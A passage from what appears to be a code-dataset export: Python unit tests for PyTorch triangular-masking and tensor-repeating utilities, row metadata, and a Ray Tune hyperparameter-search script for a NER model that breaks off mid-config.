Unit test for tril set util. This util should set lower triangular to given value
"""
self.assertTrue(torch.equal(batch_tril_set(self.batch, 0.0), self.trilRes),
msg="Difference:\n{}".format(self.trilRes - batch_tril_set(self.batch, 0.0)))
self.assertTrue(torch.equal(batch_tril_set(self.batchRectangleShapeA, 0.0), self.trilResRecShapeA),
msg="Difference:\n{}".format(
self.trilResRecShapeA - batch_tril_set(self.batchRectangleShapeA, 0.0)))
self.assertTrue(torch.equal(batch_tril_set(self.batchRectangleShapeB, 0.0), self.trilResRecShapeB),
msg="Difference:\n{}".format(
self.trilResRecShapeB - batch_tril_set(self.batchRectangleShapeB, 0.0)))
# check that original tensors don't changed
self.assertTrue(torch.equal(self.batch, self.batchClone))
self.assertTrue(torch.equal(self.batchRectangleShapeA, self.batchRectangleShapeAClone))
self.assertTrue(torch.equal(self.batchRectangleShapeB, self.batchRectangleShapeBClone))
def test_batch_tril_set_in_place(self):
"""
Unit test for tril set util working in place. This util should set lower triangular to given value
"""
batch = self.batch.clone()
shapeA = self.batchRectangleShapeA.clone()
shapeB = self.batchRectangleShapeB.clone()
self.assertTrue(torch.equal(batch_tril_set(batch, 0.0, True, True), self.trilRes),
msg="Difference:\n{}".format(self.trilRes - batch_tril_set(batch, 0.0, True, True)))
self.assertTrue(torch.equal(batch_tril_set(shapeA, 0.0, True, True), self.trilResRecShapeA),
msg="Difference:\n{}".format(self.trilResRecShapeA - batch_tril_set(shapeA, 0.0, True, True)))
self.assertTrue(torch.equal(batch_tril_set(shapeB, 0.0, True, True), self.trilResRecShapeB),
msg="Difference:\n{}".format(self.trilResRecShapeB - batch_tril_set(shapeB, 0.0, True, True)))
self.assertTrue(torch.equal(batch, self.trilRes),
msg="Difference:\n{}".format(self.trilRes - batch))
self.assertTrue(torch.equal(shapeA, self.trilResRecShapeA),
msg="Difference:\n{}".format(self.trilResRecShapeA - shapeA))
self.assertTrue(torch.equal(shapeB, self.trilResRecShapeB),
msg="Difference:\n{}".format(self.trilResRecShapeB - shapeB))
def test_batch_tril_set_without_diagonal(self):
"""
Unit test for tril set util. This util should set lower triangular to given value, this
test tests setting whole lower triangular without the diagonal elements.
"""
self.assertTrue(torch.equal(batch_tril_set(self.batch, 0.0, False), self.trilWithoutDiagonalRes),
msg="Difference:\n{}".format(
self.trilWithoutDiagonalRes - batch_tril_set(self.batch, 0.0, False)))
self.assertTrue(
torch.equal(batch_tril_set(self.batchRectangleShapeA, 0.0, False), self.trilWithoutDiagonalResRecShapeA),
msg="Difference:\n{}".format(
self.trilWithoutDiagonalResRecShapeA - batch_tril_set(self.batchRectangleShapeA, 0.0, False)))
self.assertTrue(
torch.equal(batch_tril_set(self.batchRectangleShapeB, 0.0, False), self.trilWithoutDiagonalResRecShapeB),
msg="Difference:\n{}".format(
self.trilWithoutDiagonalResRecShapeB - batch_tril_set(self.batchRectangleShapeB, 0.0, False)))
# check that original tensors don't changed
self.assertTrue(torch.equal(self.batch, self.batchClone))
self.assertTrue(torch.equal(self.batchRectangleShapeA, self.batchRectangleShapeAClone))
self.assertTrue(torch.equal(self.batchRectangleShapeB, self.batchRectangleShapeBClone))
def test_batch_tril_set_without_diagonal_in_place(self):
"""
Unit test for tril set util working in place. This util should set lower triangular to given value, this
test tests setting whole lower triangular without the diagonal elements.
"""
batch = self.batch.clone()
shapeA = self.batchRectangleShapeA.clone()
shapeB = self.batchRectangleShapeB.clone()
self.assertTrue(torch.equal(batch_tril_set(batch, 0.0, False, True), self.trilWithoutDiagonalRes),
msg="Difference:\n{}".format(
self.trilWithoutDiagonalRes - batch_tril_set(batch, 0.0, False, True)))
self.assertTrue(torch.equal(batch_tril_set(shapeA, 0.0, False, True), self.trilWithoutDiagonalResRecShapeA),
msg="Difference:\n{}".format(
self.trilWithoutDiagonalResRecShapeA - batch_tril_set(shapeA, 0.0, False, True)))
self.assertTrue(torch.equal(batch_tril_set(shapeB, 0.0, False, True), self.trilWithoutDiagonalResRecShapeB),
msg="Difference:\n{}".format(
self.trilWithoutDiagonalResRecShapeB - batch_tril_set(shapeB, 0.0, False, True)))
self.assertTrue(torch.equal(batch, self.trilWithoutDiagonalRes),
msg="Difference:\n{}".format(self.trilWithoutDiagonalRes - batch))
self.assertTrue(torch.equal(shapeA, self.trilWithoutDiagonalResRecShapeA),
msg="Difference:\n{}".format(self.trilWithoutDiagonalResRecShapeA - shapeA))
self.assertTrue(torch.equal(shapeB, self.trilWithoutDiagonalResRecShapeB),
msg="Difference:\n{}".format(self.trilWithoutDiagonalResRecShapeB - shapeB))
def test_batch_triu_set(self):
"""
Unit test for triu set util. This util should set upper triangular to given value
"""
self.assertTrue(torch.equal(batch_triu_set(self.batch, 0.0), self.triuRes),
msg="Difference:\n{}".format(self.triuRes - batch_triu_set(self.batch, 0.0)))
self.assertTrue(torch.equal(batch_triu_set(self.batchRectangleShapeA, 0.0), self.triuResRecShapeA),
msg="Difference:\n{}".format(
self.triuResRecShapeA - batch_triu_set(self.batchRectangleShapeA, 0.0)))
self.assertTrue(torch.equal(batch_triu_set(self.batchRectangleShapeB, 0.0), self.triuResRecShapeB),
msg="Difference:\n{}".format(
self.triuResRecShapeB - batch_triu_set(self.batchRectangleShapeB, 0.0)))
# check that original tensors don't changed
self.assertTrue(torch.equal(self.batch, self.batchClone))
self.assertTrue(torch.equal(self.batchRectangleShapeA, self.batchRectangleShapeAClone))
self.assertTrue(torch.equal(self.batchRectangleShapeB, self.batchRectangleShapeBClone))
def test_batch_triu_set_in_place(self):
"""
Unit test for triu set util working in place. This util should set upper triangular to given value
"""
batch = self.batch.clone()
shapeA = self.batchRectangleShapeA.clone()
shapeB = self.batchRectangleShapeB.clone()
self.assertTrue(torch.equal(batch_triu_set(batch, 0.0, True, True), self.triuRes),
msg="Difference:\n{}".format(self.triuRes - batch_triu_set(batch, 0.0, True, True)))
self.assertTrue(torch.equal(batch_triu_set(shapeA, 0.0, True, True), self.triuResRecShapeA),
msg="Difference:\n{}".format(
self.triuResRecShapeA - batch_triu_set(shapeA, 0.0, True, True)))
self.assertTrue(torch.equal(batch_triu_set(shapeB, 0.0, True, True), self.triuResRecShapeB),
msg="Difference:\n{}".format(
self.triuResRecShapeB - batch_triu_set(shapeB, 0.0, True, True)))
self.assertTrue(torch.equal(batch, self.triuRes), msg="Difference:\n{}".format(self.triuRes - batch))
self.assertTrue(torch.equal(shapeA, self.triuResRecShapeA),
msg="Difference:\n{}".format(self.triuResRecShapeA - shapeA))
self.assertTrue(torch.equal(shapeB, self.triuResRecShapeB),
msg="Difference:\n{}".format(self.triuResRecShapeB - shapeB))
def test_batch_triu_set_without_diagonal(self):
"""
Unit test for triu set util. This util should set upper triangular to given value, this
test tests setting whole upper triangular without the diagonal elements.
"""
self.assertTrue(torch.equal(batch_triu_set(self.batch, 0.0, False), self.triuWithoutDiagonalRes),
msg="Difference:\n{}".format(
self.triuWithoutDiagonalRes - batch_triu_set(self.batch, 0.0, False)))
self.assertTrue(
torch.equal(batch_triu_set(self.batchRectangleShapeA, 0.0, False), self.triuWithoutDiagonalResRecShapeA),
msg="Difference:\n{}".format(
self.triuWithoutDiagonalResRecShapeA - batch_triu_set(self.batchRectangleShapeA, 0.0, False)))
self.assertTrue(
torch.equal(batch_triu_set(self.batchRectangleShapeB, 0.0, False), self.triuWithoutDiagonalResRecShapeB),
msg="Difference:\n{}".format(
self.triuWithoutDiagonalResRecShapeB - batch_triu_set(self.batchRectangleShapeB, 0.0, False)))
# check that original tensors don't changed
self.assertTrue(torch.equal(self.batch, self.batchClone))
self.assertTrue(torch.equal(self.batchRectangleShapeA, self.batchRectangleShapeAClone))
self.assertTrue(torch.equal(self.batchRectangleShapeB, self.batchRectangleShapeBClone))
def test_batch_triu_set_without_diagonal_in_place(self):
"""
Unit test for triu set util working in place. This util should set upper triangular to given value, this
test tests setting whole upper triangular without the diagonal elements.
"""
batch = self.batch.clone()
shapeA = self.batchRectangleShapeA.clone()
shapeB = self.batchRectangleShapeB.clone()
self.assertTrue(torch.equal(batch_triu_set(batch, 0.0, False, True), self.triuWithoutDiagonalRes),
msg="Difference:\n{}".format(
self.triuWithoutDiagonalRes - batch_triu_set(batch, 0.0, False, True)))
self.assertTrue(torch.equal(batch_triu_set(shapeA, 0.0, False, True), self.triuWithoutDiagonalResRecShapeA),
msg="Difference:\n{}".format(
self.triuWithoutDiagonalResRecShapeA - batch_triu_set(shapeA, 0.0, False, True)))
self.assertTrue(torch.equal(batch_triu_set(shapeB, 0.0, False, True), self.triuWithoutDiagonalResRecShapeB),
msg="Difference:\n{}".format(
self.triuWithoutDiagonalResRecShapeB - batch_triu_set(shapeB, 0.0, False, True)))
self.assertTrue(torch.equal(batch, self.triuWithoutDiagonalRes),
msg="Difference:\n{}".format(self.triuWithoutDiagonalRes - batch))
self.assertTrue(torch.equal(shapeA, self.triuWithoutDiagonalResRecShapeA),
msg="Difference:\n{}".format(self.triuWithoutDiagonalResRecShapeA - shapeA))
self.assertTrue(torch.equal(shapeB, self.triuWithoutDiagonalResRecShapeB),
msg="Difference:\n{}".format(self.triuWithoutDiagonalResRecShapeB - shapeB))
def test_span_mask(self):
"""
Unit test of span mask util.
"""
res = span_mask(4, 3)
self.assertTrue(
torch.equal(res, torch.tensor([[0, 0], [0, 1], [0, 2], [1, 1], [1, 2], [1, 3], [2, 2], [2, 3], [3, 3]])),
msg=str(res))
res = span_mask(3, 1)
self.assertTrue(
torch.equal(res, torch.tensor([[0, 0], [1, 1], [2, 2]])),
msg=str(res))
res = span_mask(3, 4)
self.assertTrue(
torch.equal(res, torch.tensor([[0, 0], [0, 1], [0, 2], [1, 1], [1, 2], [2, 2]])),
msg=str(res))
with self.assertRaises(AssertionError):
span_mask(0, 1)
with self.assertRaises(AssertionError):
span_mask(1, 0)
with self.assertRaises(AssertionError):
span_mask(0, 0)
class TestProliferate(unittest.TestCase):
"""
Test of the proliferate method.
"""
def test_proliferate(self):
"""
Base unit test of the proliferate
"""
self.assertTrue(torch.equal(
proliferate(torch.tensor([[1, 0], [0, 1]]), 1),
torch.tensor([[1, 0], [0, 1]])
))
with self.assertRaises(AssertionError):
self.assertTrue(torch.equal(
proliferate(torch.tensor([[1, 0], [0, 1]]), 0),
torch.tensor([], dtype=torch.long)
))
with self.assertRaises(AssertionError):
proliferate(torch.tensor([[1, 0], [0, 1]]), -1)
self.assertTrue(torch.equal(
proliferate(torch.tensor([[1, 0], [0, 1]]), 4),
torch.tensor([[1, 0],
[1, 0],
[1, 0],
[1, 0],
[0, 1],
[0, 1],
[0, 1],
[0, 1]])
))
self.assertTrue(torch.equal(
proliferate(torch.tensor([[1, 3], [0, 0], [0, 1]]), 3),
torch.tensor([[1, 3],
[1, 3],
[1, 3],
[0, 0],
[0, 0],
[0, 0],
[0, 1],
[0, 1],
[0, 1]])
))
def test_proliferate_multi_dim(self):
"""
Tests proliferate on multi dim elements.
"""
self.assertTrue(torch.equal(
proliferate(torch.tensor([[[1, 0], [2, 0]], [[0, 1], [1, 1]]]), 4),
torch.tensor(
[
[[1, 0], [2, 0]],
[[1, 0], [2, 0]],
[[1, 0], [2, 0]],
[[1, 0], [2, 0]],
[[0, 1], [1, 1]],
[[0, 1], [1, 1]],
[[0, 1], [1, 1]],
[[0, 1], [1, 1]]
]
))
)
def test_proliferate_single(self):
"""
Tests proliferate on elements that are no tensors but simple units.
"""
self.assertTrue(torch.equal(
proliferate(torch.tensor([1, 0, 3]), 3),
torch.tensor(
[
1, 1, 1, 0, 0, 0, 3, 3, 3
]
))
)
if __name__ == '__main__':
unittest.main()
| 38.938492
| 118
| 0.516076
| 2,036
| 19,625
| 4.894401
| 0.062377
| 0.034922
| 0.022579
| 0.13728
| 0.872955
| 0.867938
| 0.850978
| 0.798495
| 0.730256
| 0.666633
| 0
| 0.05108
| 0.35358
| 19,625
| 503
| 119
| 39.015905
| 0.734432
| 0.079745
| 0
| 0.472727
| 0
| 0
| 0.030941
| 0
| 0
| 0
| 0
| 0
| 0.161039
| 1
| 0.033766
| false
| 0
| 0.007792
| 0
| 0.046753
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
07db98a90df4856f178dd4bc0f8420ae904d6746
| 25
|
py
|
Python
|
__init__.py
|
juergenpabel/kalliope_neuron_sonos
|
de07206f2f2969e186c3f4c37761f378bdb11b91
|
[
"MIT"
] | null | null | null |
__init__.py
|
juergenpabel/kalliope_neuron_sonos
|
de07206f2f2969e186c3f4c37761f378bdb11b91
|
[
"MIT"
] | null | null | null |
__init__.py
|
juergenpabel/kalliope_neuron_sonos
|
de07206f2f2969e186c3f4c37761f378bdb11b91
|
[
"MIT"
] | null | null | null |
from .sonos import Sonos
| 12.5
| 24
| 0.8
| 4
| 25
| 5
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.16
| 25
| 1
| 25
| 25
| 0.952381
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
07e996b6f692d272ce58d05821769a0a6550ff24
| 21,081
|
py
|
Python
|
train-template.py
|
Fangyh09/s_t
|
72bc9f7abfe937f46b7175c39d23acb914f6293d
|
[
"Apache-2.0"
] | null | null | null |
train-template.py
|
Fangyh09/s_t
|
72bc9f7abfe937f46b7175c39d23acb914f6293d
|
[
"Apache-2.0"
] | null | null | null |
train-template.py
|
Fangyh09/s_t
|
72bc9f7abfe937f46b7175c39d23acb914f6293d
|
[
"Apache-2.0"
] | null | null | null |
from model.data_utils import CoNLLDataset
from model.ner_model import NERModel
from config import Config
from tensorflow.python import debug as tf_debug
import tensorflow as tf
import ray
import ray.tune as tune
def main2():
# create instance of config
config = Config()
# build model
model = NERModel(config)
model.build()
# model.restore_session("results/crf/model.weights/") # optional, restore weights
#model.reinitialize_weights("proj")
# create datasets
dev = CoNLLDataset(config.filename_dev, config.processing_word,
config.processing_tag, config.max_iter)
train = CoNLLDataset(config.filename_train, config.processing_word,
config.processing_tag, config.max_iter)
# train model
model.train(train, dev)
def main():
default_config = Config()
dev = CoNLLDataset(default_config.filename_dev, default_config.processing_word,
default_config.processing_tag, default_config.max_iter)
train = CoNLLDataset(default_config.filename_train, default_config.processing_word,
default_config.processing_tag, default_config.max_iter)
# @ray.remote(num_gpus=1)
def train_func(_config, reporter):
# tf.reset_default_graph()
config = Config()
for (key, val) in _config.items():
# config[key] = val
setattr(config, key[3:], val)
# config["dir_output"] = ""
setattr(config, "dir_output", "")
setattr(config, "nepochs", 50)
model = NERModel(config)
model.build()
model.train(train, dev, reporter)
# ray.init(redis_address="192.168.1.201:20198")
ray.init(num_cpus=1, num_gpus=2)
tune.register_trainable("train_func_final", train_func)
# with tf.variable_scope("train_step"):
# if _lr_m == 'adam': # sgd method
# optimizer = tf.train.AdamOptimizer(lr)
# elif _lr_m == 'adagrad':
# optimizer = tf.train.AdagradOptimizer(lr)
# elif _lr_m == 'sgd':
# optimizer = tf.train.GradientDescentOptimizer(lr)
# elif _lr_m == 'rmsprop':
# optimizer = tf.train.RMSPropOpt
tune.run_experiments({
# "exp-go1": {
# "run": "train_func",
# "stop": {"mean_accuracy": 99},
# "local_dir": "/home/cewu/thirdHDD/yinghong/ray_results/go1",
# "trial_resources": {'cpu': 0, 'gpu': 1},
# # "num_gpus": 1,
#
# "config": {
# # "use_reg": tune.grid_search([False, True]),
# "hidden_size_lstm": 300,
# "hidden_size_char": tune.grid_search([100, 50, 30]),
# "dim_char": tune.grid_search([100, 50, 30]),
# # "filter_sizes": tune.grid_search([[3], [3,4], [3,4,5]]),
# # "use_cnn": tune.grid_search([True, False]),
# "input_keep_prob": 1,
# "output_keep_prob": 1,
# # "lstm_layers": tune.grid_search([1, 2, 5]),
# "clip": tune.grid_search([0, 5]),
# "lr_method": "adam",
# "lr_decay": 0.95,
# "lr": 0.005,
#
# # "resources": {"cpu": 1, "gpu": 1}
# # "momentum": tune.grid_search([0.1, 0.2]),
# }
# },
#####################
# run on sjtu02
#####################
# "exp-go2-epoch40": {
# "run": "train_func",
# "stop": {"mean_accuracy": 99},
# "local_dir": "./ray_results/go1",
# "trial_resources": {'cpu': 0, 'gpu': 1},
# # "num_gpus": 1,
#
# "config": {
# # "00-use_reg": tune.grid_search([False, True]),
# "03-hidden_size_lstm": 300,
# # # "05-hidden_size_char": tune.grid_search([100, 50, 30]),
# "05-hidden_size_char": 100,
# # # "07-dim_char": tune.grid_search([100, 50, 30]),
# "07-dim_char": 100,
# "09-filter_sizes": tune.grid_search([[3], [3,4], [3,4,5]]),
# "11-use_cnn": True,
# "13-input_keep_prob": tune.grid_search([1, 0.5]),
# "15-output_keep_prob": tune.grid_search([1, 0.5]),
# "17-lstm_layers": tune.grid_search([1, 2, 5]),
# # "19-clip": tune.grid_search([0, 5]),
# "21-lr_method": "adam",
# "23-lr_decay": 0.9,
# "25-lr": 0.001,
# # "25-lr": tune.grid_search([0.001, 0.005]),
#
# # "resources": {"cpu": 1, "gpu": 1}
# # "momentum": tune.grid_search([0.1, 0.2]),
# }
# },
# "exp-go2-epoch50-04": {
# "run": "train_func",
# "stop": {"mean_accuracy": 99},
# "local_dir": "./ray_results/go1",
# "trial_resources": {'cpu': 0, 'gpu': 1},
# # "num_gpus": 1,
#
# "config": {
# # "00-use_reg": tune.grid_search([False, True]),
# # "03-hidden_size_lstm": 300,
# # # "05-hidden_size_char": tune.grid_search([100, 50, 30]),
# # "05-hidden_size_char": 100,
# # # "07-dim_char": tune.grid_search([100, 50, 30]),
# # "07-dim_char": 100,
# "09-filter_sizes": tune.grid_search([[3,4], [3,4,5]]),
# "11-use_cnn": True,
# "13-input_keep_prob": 1,
# "15-output_keep_prob": 1,
# "17-lstm_layers": 2,
# "19-clip": 5,
# "21-lr_method": "adam",
# "23-lr_decay": 0.9,
# "25-lr": 0.001,
# "27-decay_mode": tune.grid_search(["normal", "greedy", "greedy-half"])
# # "25-lr": tune.grid_search([0.001, 0.005]),
#
# # "resources": {"cpu": 1, "gpu": 1}
# # "momentum": tune.grid_search([0.1, 0.2]),
# }
# },
# "exp-go2-epoch50-03": {
# "run": "train_func",
# "stop": {"mean_accuracy": 99},
# "local_dir": "./ray_results/go1",
# "trial_resources": {'cpu': 0, 'gpu': 1},
# # "num_gpus": 1,
#
# "config": {
# # "00-use_reg": tune.grid_search([False, True]),
# # "03-hidden_size_lstm": 300,
# # # "05-hidden_size_char": tune.grid_search([100, 50, 30]),
# # "05-hidden_size_char": 100,
# # # "07-dim_char": tune.grid_search([100, 50, 30]),
# # "07-dim_char": 100,
# "09-filter_sizes": tune.grid_search([[3, 4], [3, 4, 5]]),
# "11-use_cnn": True,
# "13-input_keep_prob": 1,
# "15-output_keep_prob": 1,
# "17-lstm_layers": 2,
# "19-clip": 5,
# "21-lr_method": "sgd",
# "23-lr_decay": 0.9,
# "25-lr": 0.1,
# "27-decay_mode": "greedy-half"
# # "25-lr": tune.grid_search([0.001, 0.005]),
#
# # "resources": {"cpu": 1, "gpu": 1}
# # "momentum": tune.grid_search([0.1, 0.2]),
# }
# },
# "exp-go2-epoch50-02": {
# "run": "train_func",
# "stop": {"mean_accuracy": 99},
# "local_dir": "./ray_results/go1",
# "trial_resources": {'cpu': 0, 'gpu': 1},
# # "num_gpus": 1,
#
# "config": {
# # "00-use_reg": tune.grid_search([False, True]),
# # "03-hidden_size_lstm": 300,
# # # "05-hidden_size_char": tune.grid_search([100, 50, 30]),
# # "05-hidden_size_char": 100,
# # # "07-dim_char": tune.grid_search([100, 50, 30]),
# # "07-dim_char": 100,
# "09-filter_sizes": tune.grid_search([[3, 4], [3, 4, 5]]),
# "11-use_cnn": True,
# "13-input_keep_prob": 1,
# "15-output_keep_prob": 1,
# "17-lstm_layers": 2,
# "19-clip": 5,
# "21-lr_method": "adam",
# "23-lr_decay": 0.9,
# "25-lr": 0.001,
# "27-decay_mode": tune.grid_search(["normal", "greedy", "greedy-half"]),
# "29-use_crf": False
# # "25-lr": tune.grid_search([0.001, 0.005]),
#
# # "resources": {"cpu": 1, "gpu": 1}
# # "momentum": tune.grid_search([0.1, 0.2]),
# }
# },
# "exp-go2-epoch50-01": {
# "run": "train_func",
# "stop": {"mean_accuracy": 99},
# "local_dir": "./ray_results/go1",
# "trial_resources": {'cpu': 0, 'gpu': 1},
# # "num_gpus": 1,
#
# "config": {
# # "00-use_reg": tune.grid_search([False, True]),
# # "03-hidden_size_lstm": 300,
# # # "05-hidden_size_char": tune.grid_search([100, 50, 30]),
# # "05-hidden_size_char": 100,
# # # "07-dim_char": tune.grid_search([100, 50, 30]),
# # "07-dim_char": 100,
# "09-filter_sizes": tune.grid_search([[3, 4], [3, 4, 5]]),
# "11-use_cnn": True,
# "13-input_keep_prob": 1,
# "15-output_keep_prob": 1,
# "17-lstm_layers": 2,
# "19-clip": 5,
# "21-lr_method": "sgd",
# "23-lr_decay": 0.9,
# "25-lr": 0.1,
# "27-decay_mode": "greedy-half",
# "29-use_crf": False
# # "25-lr": tune.grid_search([0.001, 0.005]),
#
# # "resources": {"cpu": 1, "gpu": 1}
# # "momentum": tune.grid_search([0.1, 0.2]),
# }
# },
# "exp-go3": {
# "run": "train_func",
# "stop": {"mean_accuracy": 99},
# "local_dir": "./ray_results/go1",
# "trial_resources": {'cpu': 0, 'gpu': 1},
# # "num_gpus": 1,
#
# "config": {
# "00-use_reg": tune.grid_search([False, True]),
# "03-hidden_size_lstm": 300,
# # # "05-hidden_size_char": tune.grid_search([100, 50, 30]),
# "05-hidden_size_char": 100,
# # # "07-dim_char": tune.grid_search([100, 50, 30]),
# "07-dim_char": 100,
# # "09-filter_sizes": tune.grid_search([[3], [3, 4], [3, 4, 5]]),
# # "11-use_cnn": tune.grid_search([True, False]),
# "13-input_keep_prob": tune.grid_search([1, 0.5]),
# "15-output_keep_prob": tune.grid_search([1, 0.5]),
# "17-lstm_layers": tune.grid_search([1, 2, 5]),
# "19-clip": tune.grid_search([0, 5]),
# "21-lr_method": "adam",
# "23-lr_decay": 0.9,
# "25-lr": tune.grid_search([0.001, 0.003]),
# # "25-lr": tune.grid_search([0.001, 0.005]),
#
# # "resources": {"cpu": 1, "gpu": 1}
# # "momentum": tune.grid_search([0.1, 0.2]),
# }
# },
# "exp2": {
# "run": "train_func",
# "stop": {"mean_accuracy": 99},
# "local_dir": "/home/cewu/thirdHDD/yinghong/ray_results/choose_bz-clip",
# "trial_resources": {'cpu': 0, 'gpu': 1},
# # "num_gpus": 1,
# "config": {
# "batch_size": tune.grid_search([10, 15, 20]),
# "clip": 5
# # "resources": {"cpu": 1, "gpu": 1}
# # "momentum": tune.grid_search([0.1, 0.2]),
# }
# },
# "exp1": {
# "run": "train_func",
# "stop": {"mean_accuracy": 99},
# "local_dir": "/home/cewu/thirdHDD/yinghong/ray_results/choose_bz",
# "trial_resources": {'cpu': 0, 'gpu': 1},
# # "num_gpus": 1,
# "config": {
# "batch_size": tune.grid_search([10, 15, 20]),
# # "resources": {"cpu": 1, "gpu": 1}
# # "momentum": tune.grid_search([0.1, 0.2]),
# }
# }
###################
# run on sjtu01
###################
# "exp-go3-epoch50-1": {
# "run": "train_func",
# "stop": {"mean_accuracy": 99},
# "local_dir": "./ray_results/go1",
# "trial_resources": {'cpu': 0, 'gpu': 1},
# # "num_gpus": 1,
#
# "config": {
# "13-input_keep_prob": 1,
# "15-output_keep_prob": 1,
# "17-lstm_layers": 2,
# "19-clip": tune.grid_search([5,0]),
# "21-lr_method": "adam",
# "23-lr_decay": 0.9,
# "25-lr": 0.001,
# "27-decay_mode": tune.grid_search(["normal", "greedy", "greedy-half"])
# # "25-lr": tune.grid_search([0.001, 0.005]),
#
# # "resources": {"cpu": 1, "gpu": 1}
# # "momentum": tune.grid_search([0.1, 0.2]),
# }
# },
# "exp-go3-epoch50-2": {
# "run": "train_func",
# "stop": {"mean_accuracy": 99},
# "local_dir": "./ray_results/go1",
# "trial_resources": {'cpu': 0, 'gpu': 1},
# # "num_gpus": 1,
#
# "config": {
# "13-input_keep_prob": 1,
# "15-output_keep_prob": 1,
# "17-lstm_layers": 2,
# "19-clip": tune.grid_search([5,0]),
# "21-lr_method": "sgd",
# "23-lr_decay": 0.9,
# "25-lr": 0.1,
# "27-decay_mode": tune.grid_search(["greedy-half"])
#
# # "25-lr": tune.grid_search([0.001, 0.005]),
#
# # "resources": {"cpu": 1, "gpu": 1}
# # "momentum": tune.grid_search([0.1, 0.2]),
# }
# },
# "exp-go3-epoch50-3": {
# "run": "train_func",
# "stop": {"mean_accuracy": 99},
# "local_dir": "./ray_results/go1",
# "trial_resources": {'cpu': 0, 'gpu': 1},
# # "num_gpus": 1,
#
# "config": {
# "13-input_keep_prob": 1,
# "15-output_keep_prob": 1,
# "17-lstm_layers": 1,
# "19-clip": 5,
# "21-lr_method": "adam",
# "23-lr_decay": 0.9,
# "25-lr": 0.003,
# "27-decay_mode": tune.grid_search(["normal", "greedy", "greedy-half"])
# # "25-lr": tune.grid_search([0.001, 0.005]),
#
# # "resources": {"cpu": 1, "gpu": 1}
# # "momentum": tune.grid_search([0.1, 0.2]),
# }
# },
# "exp-go3-epoch50-4": {
# "run": "train_func",
# "stop": {"mean_accuracy": 99},
# "local_dir": "./ray_results/go1",
# "trial_resources": {'cpu': 0, 'gpu': 1},
# # "num_gpus": 1,
#
# "config": {
# "13-input_keep_prob": 1,
# "15-output_keep_prob": 1,
# "17-lstm_layers": 1,
# "19-clip": 5,
# "21-lr_method": "sgd",
# "23-lr_decay": 0.9,
# "25-lr": 0.1,
# "27-decay_mode": tune.grid_search(["greedy-half"])
# # "25-lr": tune.grid_search([0.001, 0.005]),
#
# # "resources": {"cpu": 1, "gpu": 1}
# # "momentum": tune.grid_search([0.1, 0.2]),
# }
# },
# "exp-go3-epoch50-5": {
# "run": "train_func",
# "stop": {"mean_accuracy": 99},
# "local_dir": "./ray_results/go1",
# "trial_resources": {'cpu': 0, 'gpu': 1},
# # "num_gpus": 1,
#
# "config": {
# "13-input_keep_prob": 1,
# "15-output_keep_prob": 1,
# "17-lstm_layers": 2,
# "19-clip": tune.grid_search([0, 5]),
# "21-lr_method": "adam",
# "23-lr_decay": 0.9,
# "25-lr": 0.001,
# "27-decay_mode": tune.grid_search(["normal"]),
# "29-use_crf": False
# # "25-lr": tune.grid_search([0.001, 0.005]),
#
# # "resources": {"cpu": 1, "gpu": 1}
# # "momentum": tune.grid_search([0.1, 0.2]),
# }
# },
# "exp-go3-epoch50-6": {
# "run": "train_func",
# "stop": {"mean_accuracy": 99},
# "local_dir": "./ray_results/go1",
# "trial_resources": {'cpu': 0, 'gpu': 1},
# # "num_gpus": 1,
#
# "config": {
# "13-input_keep_prob": 1,
# "15-output_keep_prob": 1,
# "17-lstm_layers": 1,
# "19-clip": 5,
# "21-lr_method": "adam",
# "23-lr_decay": 0.9,
# "25-lr": 0.003,
# "27-decay_mode": tune.grid_search(["normal"]),
# "29-use_crf": False
# # "25-lr": tune.grid_search([0.001, 0.005]),
#
# # "resources": {"cpu": 1, "gpu": 1}
# # "momentum": tune.grid_search([0.1, 0.2]),
# }
# },
#
# "exp-final-epoch30": {
# "run": "train_func_final",
# "stop": {"mean_accuracy": 99},
# "local_dir": "./ray_results/06-17",
# "trial_resources": {'cpu': 0, 'gpu': 1},
# # "num_gpus": 1,
#
# "config": {
# # "00-use_reg": tune.grid_search([False, True]),
# # "03-hidden_size_lstm": 300,
# # # "05-hidden_size_char": tune.grid_search([100, 50, 30]),
# # "05-hidden_size_char": 100,
# # # "07-dim_char": tune.grid_search([100, 50, 30]),
# # "07-dim_char": 100,
# "17-lstm_layers": 2,
# "19-clip": 5,
# "21-lr_method": "adam",
# "23-lr_decay": 0.9,
# "25-lr": 0.001,
# "27-decay_mode": "none",
# # "25-lr": tune.grid_search([0.001, 0.005]),
#
# # "resources": {"cpu": 1, "gpu": 1}
# # "momentum": tune.grid_search([0.1, 0.2]),
# }
# },
"exp-final-epoch30-sgd": {
"run": "train_func_final",
"stop": {"mean_accuracy": 99},
"local_dir": "./ray_results/06-17",
"trial_resources": {'cpu': 0, 'gpu': 1},
# "num_gpus": 1,
"config": {
# "00-use_reg": tune.grid_search([False, True]),
# "03-hidden_size_lstm": 300,
# # "05-hidden_size_char": tune.grid_search([100, 50, 30]),
# "05-hidden_size_char": 100,
# # "07-dim_char": tune.grid_search([100, 50, 30]),
# "07-dim_char": 100,
"17-lstm_layers": 2,
"19-clip": 5,
"21-lr_method": "sgd",
"23-lr_decay": 0.9,
"25-lr": 0.015,
"27-decay_mode": "none",
# "25-lr": tune.grid_search([0.001, 0.005]),
# "resources": {"cpu": 1, "gpu": 1}
# "momentum": tune.grid_search([0.1, 0.2]),
}
},
# "exp-final-epoch30-sgd": {
# "run": "train_func",
# "stop": {"mean_accuracy": 99},
# "local_dir": "./ray_results/final",
# "trial_resources": {'cpu': 0, 'gpu': 1},
# # "num_gpus": 1,
#
# "config": {
# # "00-use_reg": tune.grid_search([False, True]),
# # "03-hidden_size_lstm": 300,
# # # "05-hidden_size_char": tune.grid_search([100, 50, 30]),
